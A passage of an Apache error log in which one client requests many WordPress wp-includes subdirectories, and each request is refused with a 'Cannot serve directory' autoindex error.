(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:25.667223 2024] [autoindex:error] [pid 24861:tid 139888250791680] [client 87.120.127.64:60266] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/more/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:34.813920 2024] [autoindex:error] [pid 24304:tid 139888242398976] [client 87.120.127.64:60270] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/nextpage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:41.523660 2024] [autoindex:error] [pid 24303:tid 139888351504128] [client 87.120.127.64:60274] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/page-list/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:45.764552 2024] [autoindex:error] [pid 24303:tid 139888473020160] [client 87.120.127.64:60278] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/paragraph/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:47.697214 2024] [autoindex:error] [pid 24861:tid 139888301147904] [client 87.120.127.64:60282] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:49.873000 2024] [autoindex:error] [pid 24304:tid 139888259184384] [client 87.120.127.64:60286] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-date/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:54.065085 2024] [autoindex:error] [pid 24304:tid 139888473020160] [client 87.120.127.64:60298] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-excerpt/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:56.610839 2024] [autoindex:error] [pid 24304:tid 139888267577088] [client 87.120.127.64:60304] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-featured-image/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:03.671561 2024] [autoindex:error] [pid 24302:tid 139888234006272] [client 87.120.127.64:60312] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-template/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:11.667764 2024] [autoindex:error] [pid 24861:tid 139888439449344] [client 87.120.127.64:60316] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-terms/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:13.568471 2024] [autoindex:error] [pid 24303:tid 139888259184384] [client 87.120.127.64:60320] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-title/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:20.989694 2024] [autoindex:error] [pid 24861:tid 139888242398976] [client 87.120.127.64:60324] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/preformatted/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:28.359947 2024] [autoindex:error] [pid 24304:tid 139888217220864] [client 87.120.127.64:60330] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/pullquote/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:30.393000 2024] [autoindex:error] [pid 24861:tid 139888225613568] [client 87.120.127.64:60334] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-next/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:32.991559 2024] [autoindex:error] [pid 24304:tid 139888234006272] [client 87.120.127.64:60338] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-numbers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:35.411085 2024] [autoindex:error] [pid 24861:tid 139888292755200] [client 87.120.127.64:60342] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-previous/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:42.648940 2024] [autoindex:error] [pid 24861:tid 139888326326016] [client 87.120.127.64:60352] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:46.207020 2024] [autoindex:error] [pid 24861:tid 139888489805568] [client 87.120.127.64:60356] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-title/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:22:50.966279 2024] [autoindex:error] [pid 24304:tid 139888343111424] [client 87.120.127.64:60364] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:01.759383 2024] [autoindex:error] [pid 24302:tid 139888217220864] [client 87.120.127.64:60376] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/quote/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:09.565504 2024] [autoindex:error] [pid 24302:tid 139888309540608] [client 87.120.127.64:60380] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/rss/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:12.643467 2024] [autoindex:error] [pid 24303:tid 139888225613568] [client 87.120.127.64:60384] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/search/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:16.809149 2024] [autoindex:error] [pid 24304:tid 139888464627456] [client 87.120.127.64:60388] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/separator/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:25.168304 2024] [autoindex:error] [pid 24304:tid 139888326326016] [client 87.120.127.64:60404] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/shortcode/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:33.003373 2024] [autoindex:error] [pid 24861:tid 139888292755200] [client 87.120.127.64:60418] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-logo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:36.398915 2024] [autoindex:error] [pid 24303:tid 139888326326016] [client 87.120.127.64:60422] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-tagline/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:40.445715 2024] [autoindex:error] [pid 24304:tid 139888309540608] [client 87.120.127.64:60430] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-title/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:43.173975 2024] [autoindex:error] [pid 24861:tid 139888489805568] [client 87.120.127.64:60434] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/social-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:23:55.821681 2024] [autoindex:error] [pid 24303:tid 139888456234752] [client 87.120.127.64:60452] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/navigation-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:24:04.785773 2024] [autoindex:error] [pid 24302:tid 139888234006272] [client 87.120.127.64:60464] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:24:08.627202 2024] [autoindex:error] [pid 24304:tid 139888225613568] [client 87.120.127.64:60468] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/social-links/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:24:16.670994 2024] [autoindex:error] [pid 24302:tid 139888464627456] [client 87.120.127.64:60474] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/spacer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:24:20.692932 2024] [autoindex:error] [pid 24302:tid 139888284362496] [client 87.120.127.64:60482] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/table/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:24:26.829640 2024] [autoindex:error] [pid 24302:tid 139888242398976] [client 87.120.127.64:60488] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/tag-cloud/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:24:31.109350 2024] [autoindex:error] [pid 24861:tid 139888234006272] [client 87.120.127.64:60494] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/text-columns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:24:42.365237 2024] [autoindex:error] [pid 24304:tid 139888301147904] [client 87.120.127.64:60498] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/verse/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:24:43.745903 2024] [autoindex:error] [pid 24303:tid 139888489805568] [client 87.120.127.64:60502] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/video/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:24:55.754593 2024] [autoindex:error] [pid 24304:tid 139888250791680] [client 87.120.127.64:60516] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:05.800806 2024] [autoindex:error] [pid 24861:tid 139888242398976] [client 87.120.127.64:60520] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:10.965777 2024] [autoindex:error] [pid 24861:tid 139888225613568] [client 87.120.127.64:60524] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-directory/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:25.294753 2024] [autoindex:error] [pid 24861:tid 139888292755200] [client 87.120.127.64:60530] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/components/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:28.634431 2024] [autoindex:error] [pid 24861:tid 139888259184384] [client 87.120.127.64:60534] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/customize-widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:31.583639 2024] [autoindex:error] [pid 24304:tid 139888343111424] [client 87.120.127.64:60538] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/list-reusable-blocks/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:34.902271 2024] [autoindex:error] [pid 24861:tid 139888326326016] [client 87.120.127.64:60542] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/nux/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:39.879228 2024] [autoindex:error] [pid 24303:tid 139888259184384] [client 87.120.127.64:60546] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-post/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:46.066253 2024] [autoindex:error] [pid 24303:tid 139888225613568] [client 87.120.127.64:60550] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:51.154164 2024] [autoindex:error] [pid 24303:tid 139888326326016] [client 87.120.127.64:60556] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/editor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:25:58.884423 2024] [autoindex:error] [pid 24302:tid 139888309540608] [client 87.120.127.64:60566] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/format-library/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:05.076984 2024] [autoindex:error] [pid 24861:tid 139888473020160] [client 87.120.127.64:60570] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/reusable-blocks/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:07.289726 2024] [autoindex:error] [pid 24303:tid 139888334718720] [client 87.120.127.64:60574] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:18.134917 2024] [autoindex:error] [pid 24304:tid 139888481412864] [client 87.120.127.64:60580] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:24.676294 2024] [autoindex:error] [pid 24304:tid 139888317933312] [client 87.120.127.64:60584] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:32.775588 2024] [autoindex:error] [pid 24303:tid 139888242398976] [client 87.120.127.64:60594] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:37.450748 2024] [autoindex:error] [pid 24861:tid 139888309540608] [client 87.120.127.64:60600] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:40.345832 2024] [autoindex:error] [pid 24303:tid 139888267577088] [client 87.120.127.64:60604] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:44.571560 2024] [autoindex:error] [pid 24304:tid 139888439449344] [client 87.120.127.64:60612] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:48.699203 2024] [autoindex:error] [pid 24304:tid 139888473020160] [client 87.120.127.64:60618] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:51.845962 2024] [autoindex:error] [pid 24304:tid 139888301147904] [client 87.120.127.64:60626] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex 